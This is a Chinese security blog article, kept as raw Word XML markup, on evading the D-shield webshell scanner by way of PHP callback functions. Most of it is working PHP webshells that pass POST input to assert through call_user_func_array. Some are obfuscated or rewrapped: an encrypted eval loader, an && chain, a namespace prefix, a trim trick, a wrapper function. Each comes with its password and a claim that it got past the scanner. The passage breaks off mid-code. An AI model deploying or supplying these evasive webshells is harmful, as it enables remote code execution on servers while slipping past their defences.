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9EA9" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D6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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回调函数绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D6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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>盾小套路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A2B5DA" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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注明：首发于先知社区：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D44D60">
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
            <w:color w:val="000000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/6823</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A2751B9" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333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333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最近略看表哥和是师傅们的文章，听说</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>盾把所有回调函数都拉黑了，存在回调函数就报可疑。今天我将给大家带来几种消除这个可疑的几种方法和思路，供大家参考。大家可以根据思路自行修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117704C5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常见的回调函数如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFEB5E3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call_user_func_array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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F948168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call_user_func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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35589D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array_udiff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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C952CBF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array_filter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() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E24738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array_walk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()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D31325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array_map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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92708B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array_reduce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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4794F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array_walk_recursive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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEAC6E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registregister_shutdown_function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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A89E4E9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register_tick_function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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F762C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filter_var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() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0519F3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filter_var_array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() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C16050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uasort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() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40989928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uksort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() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393860EF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接下来我就随机选择一个回调函数简单构造一些免杀马吧。那就直接选择上述第一个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call_user_func_array()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函数吧，这个函数的作用是调用回调函数，并把一个数组参数作为回调函数的参数，使用说明如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EB7CA7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call_user_func_array ( </w:t>
      </w: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callable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$callback , </w:t>
      </w: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array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$param_arr ) : mixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F19E59D" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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把第一个参数作为回调函数（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E83E8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>callback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）调用，把参数数组作（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E83E8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>param_arr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）为回调函数的的参数传入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A94CB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因此首先我就随便写了一个简单的木马如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027B2B02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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D978F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call_user_func_array(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'assert'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, </w:t>
      </w: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array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($_POST[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'a'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]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C2CC1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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDD6DC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lastRenderedPageBreak/>
        <w:t>使用最新版本的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D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盾查杀如下，报了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4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级可疑：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48587B3B" w14:textId="139ADF4C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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122111816118.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DF815B" wp14:editId="721E6879">
            <wp:extent cx="5486400" cy="3750945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C60F3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好了，已经正确表明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D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盾把回调函数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call_user_func_array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拉黑了，接下来将是我的重点，介绍如何绕过这种检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA00DF1" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>混淆加密绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A438ADB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关于这个混淆加密绕过，我用了一种十分古老的工具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"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微盾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php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脚本加密专家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"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混淆加密，因为方便，哈哈，大家也可以自行混淆加密。直接将我上诉第一次写的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D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盾报了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4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级可疑的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C329ECA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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02A42B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call_user_func_array(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'assert'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, </w:t>
      </w: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array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($_POST[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'a'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]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0960D7F9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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A1078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进行混淆加密过后得到了如下结果：成功绕过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D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盾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66C175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&lt;?php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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="CCCCCC" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>// This file is protected by copyright law &amp; provided under license. Copyright(C) 2005-2009 www.vidun.com, All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201874A1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$OOO0O0O00=</w:t>
      </w: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__FILE__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;$OOO000000=urldecode(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'%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72'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);$OO00O0000=128;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3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lastRenderedPageBreak/>
        <w:t>}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0=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'OOO0000O0'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;</w:t>
      </w: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eval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(($$O0O0000O0(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)));</w:t>
      </w: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return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;</w:t>
      </w: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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F1722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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40675A9A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木马使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BAB52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密码：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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B85FC6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lastRenderedPageBreak/>
        <w:t>扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F19DB" w14:textId="7F16377F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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122113348257.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D72551A" wp14:editId="5BBD0FDB">
            <wp:extent cx="5486400" cy="3762375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCFA1C1" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E83E8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617D2F9E" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E83E8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&amp;&amp;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符号将所有代码放到同一行来执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A98BDAE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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B18AA9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($a = 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'assert'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)&amp;&amp;($b = $_POST[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'a'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])&amp;&amp;call_user_func_array($a, </w:t>
      </w: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array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($b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6621560D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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF16DA" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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简单解释：同一行代码使用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&amp;&amp;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符号连接是按照从左到右的顺序执行的，所以首先将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assert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赋值给变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="STIXGeneral-Italic" w:eastAsia="宋体" w:hAnsi="STIXGeneral-Italic" w:cs="STIXGeneral-Italic"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>𝑎</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="STIXGeneral" w:eastAsia="宋体" w:hAnsi="STIXGeneral" w:cs="STIXGeneral"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，然后将从客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="STIXGeneral-Italic" w:eastAsia="宋体" w:hAnsi="STIXGeneral-Italic" w:cs="STIXGeneral-Italic"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>𝑝𝑜𝑠𝑡</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="STIXGeneral" w:eastAsia="宋体" w:hAnsi="STIXGeneral" w:cs="STIXGeneral"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过来的参数赋值给变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，然后将从客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过来的参数赋值给变量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b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，再使用回调函数调用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assert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函数，执行从客户端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post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过来的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C72C7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木马使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DBFE02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密码：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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC51AA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成功绕过，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D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盾扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C5D6C7" w14:textId="58CDBD58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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122195816595.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3637A681" wp14:editId="4050049C">
            <wp:extent cx="5486400" cy="3755390"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="7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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CD6FFB" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命名空间绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DA1EF" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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这个就更简单了，直接在回调函数前加上命名空间反斜杠</w:t>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E83E8C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\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即可成功绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114A3F0C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绕过代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6861598B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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B50D72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\call_user_func_array(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'assert'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, </w:t>
      </w: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array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($_POST[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'a'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]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1DA75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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB680B6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D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盾扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674A787" w14:textId="7AFE2564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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122114440654.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFB7776" wp14:editId="6D413E41">
            <wp:extent cx="5486400" cy="3758565"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B9E9D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木马使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410CC32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密码：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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537667DD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再次绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B70FD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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA5C60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($a = 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'assert'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)&amp;&amp;($b = $_POST[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'a'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])&amp;&amp;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"\x0b"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.call_user_func_array(trim(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"\x0b"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.$a), </w:t>
      </w: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array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($b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A686C7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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D2C3D" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6FB3C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随便写个函数，将回调函数藏到函数里面去，将代码执行函数和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post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的参数通过参数传给函数，即可成功绕过，绕过代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D411180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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24493A23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</w:t>
      </w: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function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v01cano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($aaa,$bbb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28481401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    call_user_func_array($aaa, $bbb);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034222F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B104B47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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    v01cano(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'assert'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,</w:t>
      </w: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array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($_POST[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'a'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]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24B357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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A00F490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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2F7A2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</w:p>
    <w:p w14:paraId="49D2A19F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这样也能绕？这也太假了吧。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F2B34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木马使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F793D95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密码：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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C7935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D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盾扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002DEAA" w14:textId="4B7F9D5D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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> INCLUDEPICTURE "https://img-blog.csdnimg.cn/20191122114350609.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3YwMWNhbm8=,size_16,color_FFFFFF,t_70" \* MERGEFORMATINET </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D22A01E" wp14:editId="32E66363">
            <wp:extent cx="5486400" cy="3762375"/>
            <wp:effectExtent l="0" t="0" r="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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924F5A1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当然也可以将回调函数放在类里面，个人认为这与放在函数里面相似，所以不在赘述了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFDB1C" w14:textId="77777777" w:rsidR="00D44D60" w:rsidRPr="00D44D60" w:rsidRDefault="00D44D60" w:rsidP="00D44D60">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="1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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D60">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自写加密函数绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B58ECC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这个可能比前面的会略微复杂一点点，因为这里我的代码执行函数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assert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直接传入回调函数被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D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盾识别了，所以我就需要隐藏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assert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，隐藏方法太多了，下面我就自己写了个仿射变换隐藏一下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assert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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3408D7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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00440D0E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</w:t>
      </w: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function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encode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($para0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB589C2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    $m=strtolower($para0);</w:t>
